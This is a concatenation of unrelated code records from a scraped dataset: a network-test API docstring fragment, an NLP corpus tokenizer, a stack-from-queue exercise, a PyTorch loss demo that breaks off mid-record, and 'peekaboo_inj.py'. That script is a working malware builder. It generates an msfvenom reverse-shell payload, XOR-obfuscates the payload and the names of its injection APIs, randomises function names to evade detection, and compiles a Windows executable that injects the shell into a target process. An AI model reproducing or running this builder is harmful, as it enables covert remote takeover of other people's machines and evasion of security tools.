remoteResetId\n - ReservedActionType (str): optional regex of reservedActionType\n - ReservedEventType (str): optional regex of reservedEventType\n - ReservedResetCode (str): optional regex of reservedResetCode\n - ResetCodeOp (str): optional regex of resetCodeOp\n - RmaAction (str): optional regex of rmaAction\n - RmaDataLength (str): optional regex of rmaDataLength\n - RtcDataLength (str): optional regex of rtcDataLength\n - SequenceId (str): optional regex of sequenceId\n - StartingRmaId (str): optional regex of startingRmaId\n - StartingRtcId (str): optional regex of startingRtcId\n - TimeStamp (str): optional regex of timeStamp\n - VendorSpecificPayloadLength (str): optional regex of vendorSpecificPayloadLength\n\n Returns\n -------\n - list(int): A list of device ids that meets the regex criteria provided in the method parameters\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._get_ngpf_device_ids(locals())\n", "sub_path": "ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ecprire_51f1030cbafd2e567d3b517032a1b011.py", "file_name": "ecprire_51f1030cbafd2e567d3b517032a1b011.py", "file_ext": "py", "file_size_in_byte": 43244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.version_info", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ixnetwork_restpy.base.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector", "line_number": 117, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb.ECpriFaultSubObjectsList", "line_number": 137, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584.OranDU", "line_number": 157, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b.OranRU", "line_number": 177, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 189, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 201, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 213, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 225, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 264, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 288, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 302, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 323, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 335, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 349, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 421, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 433, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 445, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 459, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 473, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 487, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 499, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 511, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 523, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 535, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 572, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 584, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 615, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 627, "usage_type": "call"}]} +{"seq_id": "642630602", "text": "import itertools\n\nimport datetime\nimport logging\n\nimport time\nfrom bson import ObjectId\n\nfrom . import preprocessing\nfrom ..utils.time_utils import estimate_eta\n\n__author__ = \"Haoyan Huo\"\n__maintainer__ = \"Haoyan Huo\"\n__email__ = \"haoyan.huo@lbl.gov\"\n\n\nclass CorpusTokenizer(object):\n def __init__(self, document_generator, token_storage, token_filter):\n \"\"\"\n Tokenize documents in a corpus to individual tokens.\n\n :param document_generator: A generator that gives documents, or (label, document) tuples.\n :param token_storage: Token storage instance.\n :type token_storage: TokenStorage\n :param token_filter:\n \"\"\"\n self.document_generator = document_generator\n self.token_storage = token_storage\n self.token_filter = token_filter\n\n def _feed_storage(self, tokens, label):\n for token in tokens:\n if not isinstance(token, str):\n raise ValueError('toke must be a str object!')\n if ' ' in token:\n raise ValueError('token must not contain whitespace!')\n if '\\n' in token:\n raise ValueError('token must not contain newline!')\n\n self.token_storage.feed(tokens, label=label)\n\n def _process_sentences(self, sentences, document_label, processor):\n if not sentences:\n return\n\n orths, lemma, pos = zip(*sentences)\n orths = list(itertools.chain(*orths))\n lemma = list(itertools.chain(*lemma))\n pos = list(itertools.chain(*pos))\n tokens = self.token_filter(orths, lemma, pos)\n if not tokens:\n return\n\n self._feed_storage(tokens, document_label)\n\n def _process_document(self, document, label):\n document = document.strip()\n processor = preprocessing.TextPreprocessor(document)\n cde_doc = processor.doc.user_data\n all_lemmas = processor.get_words(lemma=True)\n\n sentences = []\n for sentence in cde_doc.sentences:\n orths, pos = zip(*sentence.pos_tagged_tokens)\n orths, pos = list(orths), list(pos)\n lemma = all_lemmas[:len(orths)]\n all_lemmas = all_lemmas[len(orths):]\n\n sentences.append((orths, lemma, pos))\n\n self._process_sentences(sentences, label, processor)\n\n def tokenize(self, callback=None):\n for i_doc, document in enumerate(self.document_generator, start=1):\n if isinstance(document, tuple):\n if len(document) != 2:\n raise ValueError('document generator must yield (label, document) each time, '\n 'expected size 2, got %d!' % len(document))\n label, document = document\n else:\n label = str(i_doc)\n\n self._process_document(document, label)\n\n if callback is not None:\n callback(i_doc, document)\n\n\nclass CorpusSentenceTokenizer(CorpusTokenizer):\n def _process_sentences(self, sentences, document_label, processor):\n cde_doc = processor.doc.user_data\n for (orths, lemma, pos), sentence in zip(sentences, cde_doc.sentences):\n sent_start, sent_end = sentence.start, sentence.end\n tokens = self.token_filter(orths, lemma, pos)\n if not tokens:\n return\n\n self._feed_storage(tokens, '%s:%d-%d' % (document_label, sent_start, sent_end))\n\n\nclass CorpusToken(object):\n def __init__(self, syn_20170926, destination_collection):\n \"\"\"Generate a collection of tokenized words from syn_20170926.\n\n :param syn_20170926: Documents collection.\n :type syn_20170926: pymongo.collection.Collection or None\n :param destination_collection: Destination collection.\n :type destination_collection: pymongo.collection.Collection\n \"\"\"\n self.syn_20170926 = syn_20170926\n self.destination_collection = destination_collection\n\n self._logger = logging.getLogger('CorpusToken')\n\n def is_collection_ready(self):\n \"\"\"Test if we have a ready to use collection.\n\n :rtype: bool\n \"\"\"\n return self.destination_collection.find_one({}) is not None\n\n def _iter_paragraphs(self, document_id_fn, paragraph_filter, token_filter):\n num_total_docs = self.destination_collection.find().count()\n check_time = time.time()\n start_time = check_time\n n = 0\n\n doc_id_f = open(document_id_fn, 'w') if document_id_fn is not None else None\n\n for n, obj in enumerate(self.destination_collection.find()):\n for m, p in enumerate(obj['paragraphs']):\n\n if paragraph_filter is not None:\n p = paragraph_filter(p)\n if p is None:\n continue\n\n tokens = []\n\n for sent in p['sentences']:\n orth = sent['orth']\n lemma = sent['lemmas']\n pos = sent['pos']\n\n if token_filter is not None:\n _tokens = token_filter(orth, lemma, pos)\n else:\n _tokens = lemma\n\n if _tokens is None:\n continue\n tokens += _tokens\n\n if tokens:\n if doc_id_f:\n doc_id_f.write('{}:{}\\n'.format(obj['doi'], m))\n yield tokens\n\n n += 1\n if time.time() - check_time > 5:\n self._logger.info('Processed %d/%d documents in collection. ETA: %s',\n n, num_total_docs, estimate_eta(start_time, n, num_total_docs))\n check_time = time.time()\n\n self._logger.info('Processed %d/%d documents in collection.', n, num_total_docs)\n if doc_id_f is not None:\n doc_id_f.close()\n\n def _iter_sentences(self, document_id_fn, paragraph_filter, token_filter):\n num_total_docs = self.destination_collection.find().count()\n check_time = time.time()\n start_time = check_time\n n = 0\n\n if document_id_fn is None:\n doc_id_f = None\n elif isinstance(document_id_fn, str):\n doc_id_f = open(document_id_fn, 'w')\n else:\n doc_id_f = document_id_fn\n\n for n, obj in enumerate(self.destination_collection.find()):\n for m, p in enumerate(obj['paragraphs']):\n if paragraph_filter is not None:\n p = paragraph_filter(p)\n if p is None:\n continue\n\n current_sent_end = 0\n\n for sent in p['sentences']:\n orth = sent['orth']\n lemma = sent['lemmas']\n pos = sent['pos']\n\n current_sent_end += len(orth)\n\n if token_filter is not None:\n tokens = token_filter(orth, lemma, pos)\n else:\n tokens = lemma\n\n if tokens is None:\n continue\n\n if tokens:\n if doc_id_f:\n doc_id_f.write('{}:{}:{}:{}\\n'.format(\n obj['doi'], m, current_sent_end - len(orth), current_sent_end\n ))\n yield tokens\n\n n += 1\n if time.time() - check_time > 5:\n self._logger.info('Processed %d/%d documents in collection. ETA: %s',\n n, num_total_docs, estimate_eta(start_time, n, num_total_docs))\n check_time = time.time()\n\n self._logger.info('Processed %d/%d documents in collection.', n, num_total_docs)\n if doc_id_f is not None and isinstance(document_id_fn, str):\n doc_id_f.close()\n\n def iter_recipe_sentence(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all recipe paragraphs (MIT result).\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids. The format is:\n doi:paragraph_id:word_start_idx:word_end_idx\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n def paragraph_filter(p):\n if p['classification_MIT']['recipe']:\n return p\n else:\n return None\n\n return self._iter_sentences(document_id_fn=document_id_fn,\n paragraph_filter=paragraph_filter,\n token_filter=token_filter)\n\n def iter_all_sentence(self, token_filter=None, document_id_fn=None):\n return self._iter_sentences(document_id_fn=document_id_fn,\n paragraph_filter=None,\n token_filter=token_filter)\n\n def iter_recipe_paragraph(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all recipe paragraphs.\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids.\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n def paragraph_filter(p):\n if p['classification_MIT']['recipe']:\n return p\n else:\n return None\n\n return self._iter_paragraphs(document_id_fn=document_id_fn,\n paragraph_filter=paragraph_filter,\n token_filter=token_filter)\n\n def iter_paragraph(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all paragraphs.\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids.\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n return self._iter_paragraphs(document_id_fn=document_id_fn,\n paragraph_filter=None,\n token_filter=token_filter)\n\n def tokenize_corpus(self, object_id_list=None, clean_database=False):\n \"\"\"Tokenize all corpus in the syn_20170926.\n\n :param object_id_list: ObjectId list to tokenize.\n :type object_id_list: list\n :param clean_database: Remove old data in collection.\n :type clean_database: bool\n :returns: Statistics about number of documents processed.\n :rtype: dict\n \"\"\"\n if self.is_collection_ready() and clean_database:\n self._logger.info('Clearing old collection.')\n self.destination_collection.delete_many({})\n\n if object_id_list is None:\n num_documents = self.syn_20170926.find({}).count()\n else:\n num_documents = len(object_id_list)\n self._logger.info('Processing %d documents.', num_documents)\n\n def doc_iterator():\n if object_id_list is None:\n for _i in self.syn_20170926.find():\n yield _i\n else:\n for _i in object_id_list:\n d = self.syn_20170926.find_one({'_id': ObjectId(_i)})\n if d is None:\n raise RuntimeError('No such object %s' % _i)\n yield d\n\n statistics = {\n 'number_docs': 0,\n 'number_sentences': 0,\n 'number_words': 0\n }\n\n check_time = time.time()\n start_time = check_time\n\n for i, doc in enumerate(doc_iterator()):\n doc_token = {\n 'doi': doc['doi'],\n 'syn_20170926_id': doc['_id'],\n 'paragraphs': []\n }\n\n for j, paragraph in enumerate(doc['paragraphs']):\n processor = preprocessing.TextPreprocessor(paragraph['text'])\n cde_doc = processor.doc.user_data\n\n all_lemmas = processor.get_words(lemma=True)\n sentences = []\n for sentence in cde_doc.sentences:\n orths, pos = zip(*sentence.pos_tagged_tokens)\n lemmas = all_lemmas[:len(pos)]\n\n all_lemmas = all_lemmas[len(pos):]\n\n sentences.append({\n 'orth': orths,\n 'pos': pos,\n 'lemmas': lemmas\n })\n\n statistics['number_words'] += len(orths)\n statistics['number_sentences'] += 1\n\n assert len(all_lemmas) == 0\n\n doc_token['paragraphs'].append({\n 'id': j,\n 'sentences': sentences,\n 'classification_MIT': {\n 'recipe': paragraph['type'] == 'recipe'\n }\n })\n\n self.destination_collection.insert_one(doc_token)\n statistics['number_docs'] += 1\n\n if time.time() - check_time > 5:\n check_time = time.time()\n logging.info('Tokenization in progress. Current %d documents, %d sentences, %d words. ETA: %s',\n statistics['number_docs'], statistics['number_sentences'], statistics['number_words'],\n estimate_eta(start_time, i, num_documents))\n\n return statistics\n", "sub_path": "ParagraphClassification/nlp/corpus_tokenizer.py", "file_name": "corpus_tokenizer.py", "file_ext": "py", "file_size_in_byte": 14421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.chain", "line_number": 47, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 48, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 162, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "time.time", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 216, "usage_type": "call"}, {"api_name": "time.time", "line_number": 217, "usage_type": "call"}, {"api_name": "bson.ObjectId", "line_number": 318, "usage_type": "call"}, {"api_name": "time.time", "line_number": 329, "usage_type": "call"}, {"api_name": "time.time", "line_number": 373, "usage_type": "call"}, {"api_name": "time.time", "line_number": 374, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 375, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 377, "usage_type": "call"}]} +{"seq_id": "628663255", "text": "import collections\nclass MyStack:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.stack = collections.deque() # To use Queue methods append and popleft.\n self.last = -1094795586 # To track most recently added element.\n\n def push(self, x: int) -> None:\n \"\"\"\n Push element x onto stack.\n \"\"\"\n self.stack.append(x) # Add to Queue\n self.last = x # Update most recently added element\n\n def pop(self) -> int:\n \"\"\"\n Removes the element on top of the stack and returns that element.\n \"\"\"\n if len(self.stack) == 0:\n return self.last\n if len(self.stack) == 1: # if queue has only one element, just pop it and return.\n self.last = -1094795586\n return self.stack.popleft()\n # we will create a temporary deque to hold all element we pop from deque until the length reaches 2.\n temp = collections.deque()\n while len(self.stack) > 2:\n temp.append(self.stack.popleft())\n # Once length 2 is reached, we pop one element and store as cur_last. This will be set as self.last after popping.\n cur_last = self.stack.popleft()\n self.last = cur_last\n temp.append(cur_last)\n # to_return takes last element\n to_return = self.stack.popleft()\n self.stack = temp # assign the temporary deque to original deque\n return to_return # Return the last element\n\n def top(self) -> int:\n \"\"\"\n Get the top element.\n \"\"\"\n # simply return self.last as we are updating it each time we pop and push.\n return self.last\n\n def empty(self) -> bool:\n \"\"\"\n Returns whether the stack is empty.\n \"\"\"\n if len(self.stack):\n return False\n return True\n\n# Your MyStack object will be instantiated and called as such:\n# obj = MyStack()\n# obj.push(x)\n# param_2 = obj.pop()\n# param_3 = obj.top()\n# param_4 = obj.empty()", "sub_path": "week4/StackUsingQueue.py", "file_name": "StackUsingQueue.py", "file_ext": "py", "file_size_in_byte": 2016, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "384789419", "text": "# payload encryption functions\r\nimport argparse\r\nimport subprocess\r\nimport sys\r\nimport random\r\nimport os\r\nimport hashlib\r\nimport string\r\n\r\nclass Colors:\r\n HEADER = '\\033[95m'\r\n BLUE = '\\033[94m'\r\n GREEN = '\\033[92m'\r\n YELLOW = '\\033[93m'\r\n RED = '\\033[91m'\r\n PURPLE = '\\033[95m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\nclass PeekabooEncryptor():\r\n def __init__(self):\r\n self.XOR_PAYLOAD = self.random()\r\n self.XOR_PROC = self.random()\r\n self.XOR_DLL = self.random()\r\n\r\n def payload_key(self):\r\n return self.XOR_PAYLOAD\r\n\r\n def func_key(self):\r\n return self.random()\r\n\r\n def proc_key(self):\r\n return self.XOR_PROC\r\n\r\n def dll_key(self):\r\n return self.XOR_DLL\r\n\r\n def xor(self, data, key):\r\n key = str(key)\r\n l = len(key)\r\n output_str = \"\"\r\n\r\n for i in range(len(data)):\r\n current = data[i]\r\n current_key = key[i % len(key)]\r\n ordd = lambda x: x if isinstance(x, int) else ord(x)\r\n output_str += chr(ordd(current) ^ ord(current_key))\r\n\r\n return output_str\r\n\r\n def xor_encrypt(self, data, key):\r\n ciphertext = self.xor(data, key)\r\n ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'\r\n return ciphertext, key\r\n\r\n def random(self):\r\n length = random.randint(16, 32)\r\n return ''.join(random.choice(string.ascii_letters) for i in range(length))\r\n\r\ndef generate_payload(host, port):\r\n print (Colors.BLUE + \"generate reverse shell payload...\" + Colors.ENDC)\r\n msfv = \"msfvenom -p windows/x64/shell_reverse_tcp\"\r\n msfv += \" LHOST=\" + host\r\n msfv += \" LPORT=\" + port\r\n msfv += \" -f raw\"\r\n msfv += \" -o /tmp/hack.bin\"\r\n print (Colors.YELLOW + msfv + Colors.ENDC)\r\n try:\r\n p = subprocess.Popen(msfv.split(), stdout = subprocess.PIPE)\r\n p.wait()\r\n print (Colors.GREEN + \"reverse shell payload successfully generated :)\" + Colors.ENDC)\r\n except Exception as e:\r\n print (Colors.RED + \"generate payload failed :(\" + Colors.ENDC)\r\n sys.exit()\r\n\r\ndef run_peekaboo(host, port, proc_name, mode):\r\n banner = \"\"\"\r\n ##### ###### # # ## ##### #### ####\r\n # # # # # # # # # # # # #\r\n # # ##### #### ##### # # ##### ##### # # # #\r\n ##### # # # ###### # # # # # #\r\n # # # # # # # # # # # #\r\n # ###### # # # # ##### #### ####\r\n by @cocomelonc, many thanks to:\r\n https://institute.sektor7.net/red-team-operator-malware-development-essentials\r\n \"\"\"\r\n print (Colors.BLUE + banner + Colors.ENDC)\r\n generate_payload(host, port)\r\n encryptor = PeekabooEncryptor()\r\n print (Colors.BLUE + \"read payload...\" + Colors.ENDC)\r\n plaintext = open(\"/tmp/hack.bin\", \"rb\").read()\r\n\r\n f_vaex = \"VirtualAllocEx\"\r\n f_op = \"OpenProcess\"\r\n f_cth = \"CreateRemoteThread\"\r\n f_wfso = \"WaitForSingleObject\"\r\n f_wpm = \"WriteProcessMemory\"\r\n f_clh = \"CloseHandle\"\r\n f_p32f = \"Process32First\"\r\n f_p32n = \"Process32Next\"\r\n f_ct32s = \"CreateToolhelp32Snapshot\"\r\n\r\n f_xor = \"XOR(\"\r\n f_inj = \"Inject(\"\r\n f_ftt = \"FindTarget\"\r\n\r\n k32_name = \"kernel32\"\r\n\r\n print (Colors.BLUE + \"process name: \" + proc_name + \"...\" + Colors.ENDC)\r\n print (Colors.BLUE + \"encrypt...\" + Colors.ENDC)\r\n f_xor, f_inj, f_ftt = encryptor.random(), encryptor.random(), encryptor.random()\r\n ciphertext, p_key = encryptor.xor_encrypt(plaintext, encryptor.payload_key())\r\n ciphertext_vaex, vaex_key = encryptor.xor_encrypt(f_vaex, encryptor.func_key())\r\n ciphertext_wpm, wpm_key = encryptor.xor_encrypt(f_wpm, encryptor.func_key())\r\n ciphertext_cth, ct_key = encryptor.xor_encrypt(f_cth, encryptor.func_key())\r\n ciphertext_wfso, wfso_key = encryptor.xor_encrypt(f_wfso, encryptor.func_key())\r\n ciphertext_clh, clh_key = encryptor.xor_encrypt(f_clh, encryptor.func_key())\r\n ciphertext_p32f, p32f_key = encryptor.xor_encrypt(f_p32f, encryptor.func_key())\r\n ciphertext_p32n, p32n_key = encryptor.xor_encrypt(f_p32n, encryptor.func_key())\r\n ciphertext_op, op_key = encryptor.xor_encrypt(f_op, encryptor.func_key())\r\n ciphertext_ct32s, ct32s_key = encryptor.xor_encrypt(f_ct32s, encryptor.func_key())\r\n ciphertext_proc, proc_key = encryptor.xor_encrypt(proc_name, encryptor.proc_key())\r\n ciphertext_k32, k32_key = encryptor.xor_encrypt(k32_name, encryptor.dll_key())\r\n\r\n tmp = open(\"peekaboo_inj.cpp\", \"rt\")\r\n data = tmp.read()\r\n\r\n data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext)\r\n data = data.replace('unsigned char s_vaex[] = { };', 'unsigned char s_vaex[] = ' + ciphertext_vaex)\r\n data = data.replace('unsigned char s_cth[] = { };', 'unsigned char s_cth[] = ' + ciphertext_cth)\r\n data = data.replace('unsigned char s_wfso[] = { };', 'unsigned char s_wfso[] = ' + ciphertext_wfso)\r\n data = data.replace('unsigned char s_wpm[] = { };', 'unsigned char s_wpm[] = ' + ciphertext_wpm)\r\n data = data.replace('unsigned char s_op[] = { };', 'unsigned char s_op[] = ' + ciphertext_op)\r\n data = data.replace('unsigned char s_clh[] = { };', 'unsigned char s_clh[] = ' + ciphertext_clh)\r\n data = data.replace('unsigned char s_p32f[] = { };', 'unsigned char s_p32f[] = ' + ciphertext_p32f)\r\n data = data.replace('unsigned char s_p32n[] = { };', 'unsigned char s_p32n[] = ' + ciphertext_p32n)\r\n data = data.replace('unsigned char s_ct32s[] = { };', 'unsigned char s_ct32s[] = ' + ciphertext_ct32s)\r\n data = data.replace('unsigned char my_proc[] = { };', 'unsigned char my_proc[] = ' + ciphertext_proc)\r\n data = data.replace('unsigned char s_k32[] = { };', 'unsigned char s_k32[] = ' + ciphertext_k32)\r\n\r\n data = data.replace('char my_payload_key[] = \"\";', 'char my_payload_key[] = \"' + p_key + '\";')\r\n data = data.replace('char my_proc_key[] = \"\";', 'char my_proc_key[] = \"' + proc_key + '\";')\r\n data = data.replace('char s_vaex_key[] = \"\";', 'char s_vaex_key[] = \"' + vaex_key + '\";')\r\n data = data.replace('char s_wpm_key[] = \"\";', 'char s_wpm_key[] = \"' + wpm_key + '\";')\r\n data = data.replace('char s_cth_key[] = \"\";', 'char s_cth_key[] = \"' + ct_key + '\";')\r\n data = data.replace('char s_wfso_key[] = \"\";', 'char s_wfso_key[] = \"' + wfso_key + '\";')\r\n data = data.replace('char s_clh_key[] = \"\";', 'char s_clh_key[] = \"' + clh_key + '\";')\r\n data = data.replace('char s_p32f_key[] = \"\";', 'char s_p32f_key[] = \"' + p32f_key + '\";')\r\n data = data.replace('char s_p32n_key[] = \"\";', 'char s_p32n_key[] = \"' + p32n_key + '\";')\r\n data = data.replace('char s_op_key[] = \"\";', 'char s_op_key[] = \"' + op_key + '\";')\r\n data = data.replace('char s_ct32s_key[] = \"\";', 'char s_ct32s_key[] = \"' + ct32s_key + '\";')\r\n data = data.replace('char k32_key[] = \"\";', 'char k32_key[] = \"' + k32_key + '\";')\r\n data = data.replace('XOR(', f_xor + \"(\")\r\n data = data.replace(\"Inject(\", f_inj + \"(\")\r\n data = data.replace(\"FindTarget(\", f_ftt + \"(\")\r\n\r\n if mode == \"console\":\r\n data = data.replace(\"int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\", \"int main(void) {\")\r\n\r\n tmp.close()\r\n tmp = open(\"peekaboo-enc.cpp\", \"w+\")\r\n tmp.write(data)\r\n tmp.close()\r\n\r\n print (Colors.GREEN + \"successfully encrypt template file :)\" + Colors.ENDC)\r\n\r\n try:\r\n cmd = \"x86_64-w64-mingw32-gcc -O2 peekaboo-enc.cpp -o peekaboo.exe -m\" + mode + \" -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1\"\r\n os.system(cmd)\r\n os.remove(\"peekaboo-enc.cpp\")\r\n except:\r\n print (Colors.RED + \"error compiling template :(\" + Colors.ENDC)\r\n sys.exit()\r\n else:\r\n print (Colors.YELLOW + cmd + Colors.ENDC)\r\n print (Colors.GREEN + \"successfully compiled :)\" + Colors.ENDC)\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-l','--lhost', required = True, help = \"local IP\")\r\n parser.add_argument('-p','--lport', required = True, help = \"local port\", default = '4444')\r\n parser.add_argument('-e', '--proc', required = False, help = \"process name\", default = \"notepad.exe\")\r\n parser.add_argument(\"-m\", '--mode', required = False, help = \"console or windows app\", default = \"windows\")\r\n args = vars(parser.parse_args())\r\n host, port = args['lhost'], args['lport']\r\n proc_name, mode = args['proc'], args['mode']\r\n run_peekaboo(host, port, proc_name, mode)\r\n", "sub_path": "peekaboo_inj.py", "file_name": "peekaboo_inj.py", "file_ext": "py", "file_size_in_byte": 8800, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 59, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 70, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 75, "usage_type": "call"}, {"api_name": "os.system", "line_number": 170, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 174, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "131474125", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndef myCrossEntropyLoss(outputs, labels):\n batch_size = outputs.size()[0]\n # batch_size\n tmp_outputs = F.softmax(outputs, dim=1)\n print(tmp_outputs)# compute the log of softmax values\n outputs = F.log_softmax(outputs, dim=1)\n print(outputs)# compute the log of softmax values\n outputs = outputs[range(batch_size), labels] # pick the values corresponding to the labels\n return -torch.sum(outputs)/len(labels)\n\nm = nn.LogSoftmax()\nloss = nn.NLLLoss()\n# input is of size N x C = 3 x 5\ninput = torch.randn(3, 5)\nprint(input)\n# each element in target has to have 0 <= value < C\ntarget = torch.tensor([1, 0, 4])\nprint(len(target))\noutput = loss(m(input), target)\nprint(output)\nprint(output.item())\noutput2 = myCrossEntropyLoss(input, target)\nprint(output2)\n#Mean Squared Error Loss\nmse_loss = nn.MSELoss()\noutputs = torch.randn(3, 5, requires_grad=True)\nprint(outputs)\ntargets = torch.randn(3, 5)\nloss = mse_loss(outputs, targets)\nprint(loss)\n#Categorical Cross-Entropy Loss\nce_loss = nn.CrossEntropyLoss()\noutputs = torch.randn(3, 5, requires_grad=True)\ntargets = torch.tensor([1, 0, 3], dtype=torch.int64)\nloss = ce_loss(outputs, targets)\nprint(loss)\n\n", "sub_path": "pythonML/notebooks/Pytorch/scripts/nn_loss.py", "file_name": "nn_loss.py", "file_ext": "py", "file_size_in_byte": 1239, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.functional.softmax", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 29, "usage_type": "call"}, 